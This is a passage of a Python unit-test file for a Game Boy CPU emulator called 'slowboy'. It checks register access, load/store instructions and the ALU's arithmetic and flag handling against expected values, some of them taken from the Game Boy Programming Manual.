self.assertEqual(self.cpu.get_reg16('DE'), 0x3456)
self.assertEqual(self.cpu.get_reg16('HL'), 0x5678)
self.assertEqual(self.cpu.get_reg16('sp'), 0x7fff)
def test_set_sp(self):
self.cpu.sp = 0x51234
self.assertEqual(self.cpu.sp, 0x1234)
def test_get_sp(self):
self.cpu.sp = 0x1234
self.assertEqual(self.cpu.sp, self.cpu.sp)
def test_inc_sp(self):
self.cpu.sp = 0x1234
self.cpu.inc_sp()
self.assertEqual(self.cpu.sp, 0x1235)
def test_set_pc(self):
self.cpu.pc = 0x1000
self.assertEqual(self.cpu.pc, 0x1000)
def test_get_pc(self):
self.cpu.pc = 0x11000
self.assertEqual(self.cpu.get_pc(), 0x1000)
def test_inc_pc(self):
self.cpu.pc = 0xffff
self.cpu.inc_pc()
self.assertEqual(self.cpu.get_pc(), 0x0000)
def test_nop(self):
regA = self.cpu.get_reg8('A')
regB = self.cpu.get_reg8('B')
regC = self.cpu.get_reg8('C')
regD = self.cpu.get_reg8('D')
regE = self.cpu.get_reg8('E')
regH = self.cpu.get_reg8('H')
regL = self.cpu.get_reg8('L')
self.cpu.nop()
self.cpu.nop()
self.assertEqual(self.cpu.get_reg8('A'), regA)
self.assertEqual(self.cpu.get_reg8('B'), regB)
self.assertEqual(self.cpu.get_reg8('C'), regC)
self.assertEqual(self.cpu.get_reg8('D'), regD)
self.assertEqual(self.cpu.get_reg8('E'), regE)
self.assertEqual(self.cpu.get_reg8('H'), regH)
self.assertEqual(self.cpu.get_reg8('L'), regL)
class TestZ80LoadStore(unittest.TestCase):
def setUp(self):
self.cpu = slowboy.z80.Z80()
self.cpu.pc = 0
def test_ld_imm8toreg8(self):
self.cpu.mmu.rom = bytes([0, 1, 2, 3, 4, 5, 6])
self.cpu.ld_imm8toreg8('B')()
self.cpu.ld_imm8toreg8('C')()
self.cpu.ld_imm8toreg8('D')()
self.cpu.ld_imm8toreg8('E')()
self.cpu.ld_imm8toreg8('H')()
self.cpu.ld_imm8toreg8('L')()
self.cpu.ld_imm8toreg8('A')()
self.assertEqual(self.cpu.get_reg8('B'), 0)
self.assertEqual(self.cpu.get_reg8('C'), 1)
self.assertEqual(self.cpu.get_reg8('D'), 2)
self.assertEqual(self.cpu.get_reg8('E'), 3)
self.assertEqual(self.cpu.get_reg8('H'), 4)
self.assertEqual(self.cpu.get_reg8('L'), 5)
self.assertEqual(self.cpu.get_reg8('A'), 6)
def test_ld_imm8toreg8_invalid_register(self):
self.cpu.mmu.rom = bytes([0, 1, 2, 3, 4, 5, 6])
with self.assertRaises(KeyError) as cm:
self.cpu.ld_imm8toreg8('BC')()
def test_ld_reg8toreg8(self):
self.cpu.set_reg8('B', 0x00)
self.cpu.set_reg8('C', 0x11)
self.cpu.set_reg8('D', 0x22)
self.cpu.set_reg8('E', 0x33)
self.cpu.set_reg8('H', 0x44)
self.cpu.set_reg8('L', 0x55)
self.cpu.set_reg8('A', 0x66)
self.cpu.ld_reg8toreg8('B', 'B')()
self.assertEqual(self.cpu.get_reg8('B'), 0x00)
self.cpu.ld_reg8toreg8('C', 'B')()
self.assertEqual(self.cpu.get_reg8('B'), 0x11)
self.cpu.ld_reg8toreg8('D', 'B')()
self.assertEqual(self.cpu.get_reg8('B'), 0x22)
self.cpu.ld_reg8toreg8('E', 'B')()
self.assertEqual(self.cpu.get_reg8('B'), 0x33)
self.cpu.ld_reg8toreg8('H', 'B')()
self.assertEqual(self.cpu.get_reg8('B'), 0x44)
self.cpu.ld_reg8toreg8('L', 'B')()
self.assertEqual(self.cpu.get_reg8('B'), 0x55)
self.cpu.ld_reg8toreg8('A', 'B')()
self.assertEqual(self.cpu.get_reg8('B'), 0x66)
def test_ld_reg8toreg8_invalid_register(self):
with self.assertRaises(KeyError) as cm:
self.cpu.ld_reg8toreg8('C', 'BC')()
with self.assertRaises(KeyError) as cm:
self.cpu.ld_reg8toreg8('BC', 'C')()
def test_ld_reg8toreg16addr(self):
for x in range(256):
self.cpu.set_reg8('a', x)
self.cpu.set_reg16('bc', 0xc000 + x)
self.cpu.ld_reg8toreg16addr('a', 'bc')()
self.assertEqual(self.cpu.mmu.get_addr(0xc000 + x), x)
self.assertEqual(self.cpu.get_reg16('bc'), 0xc000 + x)
def test_ld_reg8toreg16addr_inc(self):
self.cpu.set_reg8('b', 0xfd)
self.cpu.set_reg16('de', 0xcfff)
self.cpu.ld_reg8toreg16addr_inc('b', 'de')()
self.assertEqual(self.cpu.mmu.get_addr(0xcfff), 0xfd)
self.assertEqual(self.cpu.get_reg8('b'), 0xfd)
self.assertEqual(self.cpu.get_reg16('de'), 0xd000)
def test_ld_reg8toreg16addr_dec(self):
self.cpu.set_reg8('b', 0xfd)
self.cpu.set_reg16('de', 0xcfff)
self.cpu.ld_reg8toreg16addr_dec('b', 'de')()
self.assertEqual(self.cpu.mmu.get_addr(0xcfff), 0xfd)
self.assertEqual(self.cpu.get_reg8('b'), 0xfd)
self.assertEqual(self.cpu.get_reg16('de'), 0xcffe)
def test_ld_reg8toreg16addr_2(self):
self.cpu.set_reg16('bc', 0xc000)
for x in range(256):
self.cpu.set_reg8('a', x)
self.cpu.ld_reg8toreg16addr_inc('a', 'bc')()
self.assertEqual(self.cpu.mmu.get_addr(0xc000 + x), x)
def test_ld_reg8toreg16addr_3(self):
self.cpu.set_reg16('bc', 0xc0ff)
for x in range(256):
self.cpu.set_reg8('a', x)
self.cpu.ld_reg8toreg16addr_dec('a', 'bc')()
self.assertEqual(self.cpu.mmu.get_addr(0xc0ff - x), x)
def test_ld_reg8toimm16addr(self):
self.cpu.set_reg8('a', 0xab)
self.cpu.mmu.rom = bytes([0x00, 0xc0])
self.cpu.ld_reg8toimm16addr('a')()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0xab)
def test_ld_imm16addrtoreg8(self):
self.cpu.mmu.set_addr(0xd000, 0xab)
self.cpu.mmu.rom = bytes([0x00, 0xd0])
self.cpu.ld_imm16addrtoreg8('c')()
self.assertEqual(self.cpu.get_reg8('c'), 0xab)
def test_ld_reg16addrtoreg8(self):
self.cpu.set_reg16('hl', 0xd000)
for x in range(256):
self.cpu.mmu.set_addr(0xd000 + x, x)
self.cpu.ld_reg16addrtoreg8('hl', 'c', inc=True)()
self.assertEqual(self.cpu.get_reg8('c'), x)
def test_ld_reg16addrtoreg8_2(self):
self.cpu.set_reg16('hl', 0xd0ff)
for x in range(256):
self.cpu.mmu.set_addr(0xd0ff - x, x)
self.cpu.ld_reg16addrtoreg8('hl', 'c', dec=True)()
self.assertEqual(self.cpu.get_reg8('c'), x)
def test_ld_reg16addrtoreg8_3(self):
with self.assertRaises(ValueError) as cm:
self.cpu.set_reg16('hl', 0xd000)
self.cpu.mmu.set_addr(0xd000, 3)
self.cpu.ld_reg16addrtoreg8('hl', 'c', inc=True, dec=True)()
def test_ld_reg16addrtoreg8_4(self):
self.cpu.set_reg16('hl', 0xd000)
self.cpu.mmu.set_addr(0xd000, 0x53)
self.cpu.ld_reg16addrtoreg8('hl', 'c')()
self.assertEqual(self.cpu.get_reg8('c'), 0x53)
def test_ld_reg16toreg16(self):
self.cpu.set_reg16('hl', 0x7654)
self.cpu.ld_reg16toreg16('hl', 'sp')()
self.assertEqual(self.cpu.sp, 0x7654)
def test_ld_spimm8toregHL(self):
self.cpu.sp = 0x7000
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0x80])
self.cpu.ld_spimm8toregHL()
self.assertEqual(self.cpu.get_reg16('hl'), 0x7080)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_ld_spimm8toregHL_2(self):
# Make sure carry and half-carry get set
self.cpu.sp = 0x7001
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0xff])
self.cpu.ld_spimm8toregHL()
self.assertEqual(self.cpu.get_reg16('hl'), 0x7100)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_ld_sptoimm16addr(self):
self.cpu.sp = 0x1234
self.cpu.mmu.rom = bytes([0x00, 0xd0])
self.cpu.ld_sptoimm16addr()
self.assertEqual(self.cpu.get_pc(), 2)
self.assertEqual(self.cpu.mmu.get_addr(0xd000),
self.cpu.sp >> 8)
self.assertEqual(self.cpu.mmu.get_addr(0xd001),
self.cpu.sp & 0xff)
self.assertEqual(self.cpu.mmu.get_addr(0xd000), 0x12)
self.assertEqual(self.cpu.mmu.get_addr(0xd001), 0x34)
def test_ld_sptoaddr16_2(self):
for x in range(2**10):
self.cpu.sp = x
self.cpu.set_reg16('bc', 0xd000 + 2*x)
self.cpu.ld_sptoreg16addr('bc')()
self.assertEqual(self.cpu.mmu.get_addr(0xd000 + 2*x),
self.cpu.sp >> 8)
self.assertEqual(self.cpu.mmu.get_addr(0xd000 + 2*x + 1),
self.cpu.sp & 0xff)
self.assertEqual(self.cpu.mmu.get_addr(0xd000 + 2*x), x >> 8)
self.assertEqual(self.cpu.mmu.get_addr(0xd000 + 2*x + 1), x & 0xff)
def test_ld_imm8toaddrHL(self):
self.cpu.mmu.rom = bytes([0, 255, 127])
self.cpu.set_reg16('hl', 0xcfff)
self.cpu.ld_imm8toaddrHL()
self.assertEqual(self.cpu.mmu.get_addr(0xcfff), 0)
self.cpu.ld_imm8toaddrHL()
self.assertEqual(self.cpu.mmu.get_addr(0xcfff), 255)
self.cpu.ld_imm8toaddrHL()
self.assertEqual(self.cpu.mmu.get_addr(0xcfff), 127)
def test_ld_imm16toreg16(self):
self.cpu.mmu.rom = bytes([0x01, 0x23, 0x45, 0x67, 0x89, 0xab])
self.cpu.ld_imm16toreg16('BC')()
self.cpu.ld_imm16toreg16('DE')()
self.cpu.ld_imm16toreg16('HL')()
self.assertEqual(self.cpu.get_reg16('BC'), 0x2301)
self.assertEqual(self.cpu.get_reg16('DE'), 0x6745)
self.assertEqual(self.cpu.get_reg16('HL'), 0xab89)
def test_push_reg16(self):
self.cpu.set_reg16('sp', 0xc002)
self.cpu.set_reg16('bc', 0x1234)
self.cpu.push_reg16('bc')()
self.assertEqual(self.cpu.sp, 0xc000)
self.assertEqual(self.cpu.mmu.get_addr(0xc001), 0x12)
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x34)
def test_pop_reg16(self):
self.cpu.set_reg16('sp', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x34)
self.cpu.mmu.set_addr(0xc001, 0x12)
self.cpu.pop_reg16('bc')()
self.assertEqual(self.cpu.sp, 0xc002)
self.assertEqual(self.cpu.get_reg16('bc'), 0x1234)
def test_ldh_regAtoaddr8(self):
# JOYP register---bits 4 and 5 are writable
self.cpu.pc = 0xc000
self.cpu.mmu.set_addr(0xc000, 0x00)
self.cpu.set_reg8('a', 0x30)
self.cpu.ldh_regAtoaddr8()
# Bits 0-3 indicate pressed buttons (active low)
self.assertEqual(self.cpu.mmu.get_addr(0xff00), 0x30 | 0x0f)
def test_ldh_addr8toregA(self):
self.cpu.pc = 0xc000
self.cpu.mmu.set_addr(0xc000, 0x00)
# JOYP register---bits 4 and 5 are writable
self.cpu.mmu.set_addr(0xff00, 0x30)
self.cpu.ldh_addr8toregA()
# Bits 0-3 indicate pressed buttons (active low)
self.assertEqual(self.cpu.get_reg8('a'), 0x30 | 0x0f)
def test_ldh_regAtoaddrC(self):
# JOYP register---bits 4 and 5 are writable
self.cpu.set_reg8('a', 0x30)
self.cpu.set_reg8('c', 0x00)
self.cpu.ldh_regAtoaddrC()
# Bits 0-3 indicate pressed buttons (active low)
self.assertEqual(self.cpu.mmu.get_addr(0xff00), 0x30 | 0x0f)
def test_ldh_addrCtoregA(self):
# JOYP register---bits 4 and 5 are writable
self.cpu.mmu.set_addr(0xff00, 0x30)
self.cpu.set_reg8('c', 0x00)
self.cpu.ldh_addrCtoregA()
# Bits 0-3 indicate pressed buttons (active low)
self.assertEqual(self.cpu.get_reg8('a'), 0x30 | 0x0f)
class TestZ80ALU(unittest.TestCase):
def setUp(self):
self.cpu = slowboy.z80.Z80()
self.cpu.pc = 0
def test_inc_reg8(self):
self.cpu.set_reg8('b', 0x04)
self.cpu.inc_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x05)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_inc_reg8_2(self):
self.cpu.set_reg8('b', 0x0f)
self.cpu.inc_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x10)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_inc_reg8_3(self):
self.cpu.set_reg8('b', 0xff)
self.cpu.inc_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_inc_reg16(self):
self.cpu.set_reg16('bc', 0xeeff)
self.cpu.inc_reg16('bc')()
c = self.cpu.get_carry_flag()
h = self.cpu.get_halfcarry_flag()
s = self.cpu.get_sub_flag()
z = self.cpu.get_zero_flag()
self.assertEqual(self.cpu.get_reg16('bc'), 0xef00)
self.assertEqual(self.cpu.get_carry_flag(), c)
self.assertEqual(self.cpu.get_halfcarry_flag(), h)
self.assertEqual(self.cpu.get_sub_flag(), s)
self.assertEqual(self.cpu.get_zero_flag(), z)
def test_inc_addrHL(self):
# From the Game Boy Programming Manual
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x50)
self.cpu.inc_addrHL()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x51)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_inc_addrHL_2(self):
# Make sure half-carry and zero flags get set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0xff)
self.cpu.inc_addrHL()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_dec_reg8(self):
self.cpu.set_reg8('b', 0x04)
self.cpu.dec_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x03)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
def test_dec_reg8_2(self):
self.cpu.set_reg8('b', 0x10)
self.cpu.dec_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x0f)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
def test_dec_reg8_3(self):
# Make sure zero flag gets set
self.cpu.set_reg8('b', 0x01)
self.cpu.dec_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
def test_dec_reg8_4(self):
self.cpu.set_reg8('b', 0x00)
self.cpu.dec_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0xff)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
def test_dec_reg16(self):
self.cpu.set_reg16('bc', 0xee)
self.cpu.dec_reg16('bc')()
self.assertEqual(self.cpu.get_reg16('bc'), 0xed)
def test_dec_addrHL(self):
# Example from the Game Boy Programming Manual
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x00)
self.cpu.dec_addrHL()
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0xff)
def test_dec_addrHL_2(self):
# Make sure zero flag gets set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x01)
self.cpu.dec_addrHL()
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x00)
def test_add_imm8toreg8(self):
self.cpu.set_reg8('a', 0xaf)
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0x11])
self.cpu.add_imm8toreg8('a')()
self.assertEqual(self.cpu.get_reg8('a'), 0xc0)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_zero_flag(), 0)
def test_add_imm8toreg8_2(self):
self.cpu.set_reg8('a', 0xff)
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0x01])
self.cpu.add_imm8toreg8('a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_zero_flag(), 1)
def test_add_imm8toreg8_3(self):
self.cpu.set_reg8('a', 0xf0)
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0x10])
self.cpu.add_imm8toreg8('a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_zero_flag(), 1)
def test_add_imm8toreg8_4(self):
# add with carry
self.cpu.set_reg8('a', 0xf0)
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0x10])
self.cpu.set_carry_flag()
self.cpu.add_imm8toreg8('a', carry=True)()
self.assertEqual(self.cpu.get_reg8('a'), 0x01)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_zero_flag(), 0)
def test_add_imm8toregSP(self):
self.cpu.sp = 0x7000
self.cpu.mmu.rom = bytes([0xfe])
self.cpu.add_imm8toregSP()
self.assertEqual(self.cpu.sp, 0x70fe)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_add_reg16addrtoreg8(self):
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x11)
self.cpu.set_reg8('a', 0x3f)
self.cpu.add_reg16addrtoreg8('hl', 'a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x50)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_add_reg16addrtoreg8_2(self):
# Make sure carry flag gets set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0xd0)
self.cpu.set_reg8('a', 0x3f)
self.cpu.add_reg16addrtoreg8('hl', 'a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x0f)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_add_reg16addrtoreg8_3(self):
# Make sure zero flag gets set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0xc1)
self.cpu.set_reg8('a', 0x3f)
self.cpu.add_reg16addrtoreg8('hl', 'a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_add_reg16addrtoreg8_4(self):
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0xc0)
self.cpu.set_reg8('a', 0x3f)
self.cpu.add_reg16addrtoreg8('hl', 'a', carry=True)()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_zero_flag(), 1)
def test_add_imm8toregSP_2(self):
self.cpu.sp = 0x70fe
self.cpu.mmu.rom = bytes([0x02])
self.cpu.add_imm8toregSP()
self.assertEqual(self.cpu.sp, 0x7100)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_add_reg16toregHL(self):
self.cpu.set_reg16('bc', 0xffff)
self.cpu.set_reg16('hl', 0x0001)
self.cpu.add_reg16toregHL('bc')()
self.assertEqual(self.cpu.get_reg16('hl'), 0x0000)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
def test_add_reg16toregHL_2(self):
# Make sure carry and half-carry are not set
self.cpu.set_reg16('bc', 0xffee)
self.cpu.set_reg16('hl', 0x0011)
self.cpu.add_reg16toregHL('bc')()
self.assertEqual(self.cpu.get_reg16('hl'), 0xffff)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
def test_add_reg8toreg8(self):
self.cpu.set_reg8('b', 0xfe)
self.cpu.set_reg8('c', 0x01)
self.cpu.add_reg8toreg8('c', 'b')()
self.assertEqual(self.cpu.get_reg8('b'), 0xff)
self.assertEqual(self.cpu.get_reg8('c'), 0x01)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_add_reg8toreg8_2(self):
"""Example from the Gameboy Programming Manual"""
self.cpu.set_reg8('a', 0x3a)
self.cpu.set_reg8('b', 0xc6)
self.cpu.add_reg8toreg8('b', 'a')()
self.assertEqual(self.cpu.get_reg8('a'), 0)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_add_reg8toreg8_withcarry(self):
"""Example from the Gameboy Programming Manual"""
# TODO: add a test using (HL)
self.cpu.set_reg8('a', 0xe1)
self.cpu.set_reg8('e', 0x0f)
self.cpu.set_carry_flag()
self.cpu.add_reg8toreg8('e', 'a', carry=True)()
self.assertEqual(self.cpu.get_reg8('a'), 0xf1)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_sub_reg8fromreg8(self):
self.cpu.set_reg8('b', 0xff)
self.cpu.set_reg8('c', 0x11)
self.cpu.sub_reg8fromreg8('c', 'b')()
self.assertEqual(self.cpu.get_reg8('c'), 0x11)
self.assertEqual(self.cpu.get_reg8('b'), 0xee)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.cpu.set_reg8('b', 0x00)
self.cpu.set_reg8('c', 0x01)
self.cpu.sub_reg8fromreg8('c', 'b')()
self.assertEqual(self.cpu.get_reg8('c'), 0x01)
self.assertEqual(self.cpu.get_reg8('b'), 0xff)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
def test_sub_reg8fromreg8_2(self):
"""Example from the Gameboy Programming Manual"""
self.cpu.set_reg8('a', 0x3e)
self.cpu.set_reg8('e', 0x3e)
self.cpu.sub_reg8fromreg8('e', 'a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_sub_reg8fromreg8_3(self):
"""Example from the Gameboy Programming Manual"""
self.cpu.set_reg8('a', 0x3b)
self.cpu.set_reg8('h', 0x2a)
self.cpu.sub_reg8fromreg8('h', 'a', carry=True)()
self.assertEqual(self.cpu.get_reg8('a'), 0x10)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_sub_imm8fromreg8(self):
"""Example from the Gameboy Programming Manual"""
self.cpu.set_reg8('a', 0x3e)
self.cpu.mmu.rom = bytes([0x0f])
self.cpu.sub_imm8fromreg8('a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x2f)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_sub_imm8fromreg8_2(self):
# Make sure zero flag gets set
self.cpu.set_reg8('a', 0x3e)
self.cpu.mmu.rom = bytes([0x3e])
self.cpu.sub_imm8fromreg8('a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_sub_imm8fromreg8_3(self):
# Make sure carry flag gets set
self.cpu.set_reg8('a', 0x00)
self.cpu.mmu.rom = bytes([0x3e])
self.cpu.sub_imm8fromreg8('a')()
self.assertEqual(self.cpu.get_reg8('a'), 0xc2)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_sub_imm8fromreg8_4(self):
self.cpu.set_reg8('a', 0x00)
self.cpu.mmu.rom = bytes([0x3e])
self.cpu.set_carry_flag()
self.cpu.sub_imm8fromreg8('a', carry=True)()
self.assertEqual(self.cpu.get_reg8('a'), 0xc1)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_sub_imm16addrfromreg8(self):
"""Example from the Gameboy Programming Manual"""
u8 = self.cpu.get_reg8('a')
self.cpu.mmu.rom = bytes([0x00, 0xc0])
self.cpu.set_reg8('a', 0x3e)
self.cpu.mmu.set_addr(0xc000, 0x40)
self.cpu.sub_imm16addrfromreg8('a')()
self.assertEqual(self.cpu.get_reg8('a'), 0xfe)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_sub_imm16addrfromreg8_2(self):
# Make sure the zero flag gets set
u8 = self.cpu.get_reg8('a')
self.cpu.mmu.rom = bytes([0x00, 0xc0])
self.cpu.set_reg8('a', 0x3e)
self.cpu.mmu.set_addr(0xc000, 0x3e)
self.cpu.sub_imm16addrfromreg8('a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_sub_imm16addrfromreg8_3(self):
# Make sure the half-carry flag gets set
self.cpu.mmu.rom = bytes([0x00, 0xc0])
self.cpu.set_reg8('a', 0x3e)
self.cpu.mmu.set_addr(0xc000, 0x3f)
self.cpu.sub_imm16addrfromreg8('a')()
self.assertEqual(self.cpu.get_reg8('a'), 0xff)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_sub_imm16addrfromreg8_4(self):
# Make sure the half-carry flag gets set
u8 = self.cpu.get_reg8('a')
self.cpu.mmu.rom = bytes([0x00, 0xc0])
self.cpu.set_carry_flag()
self.cpu.set_reg8('a', 0x3e)
self.cpu.mmu.set_addr(0xc000, 0x3e)
self.cpu.sub_imm16addrfromreg8('a', carry=True)()
self.assertEqual(self.cpu.get_reg8('a'), 0xff)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
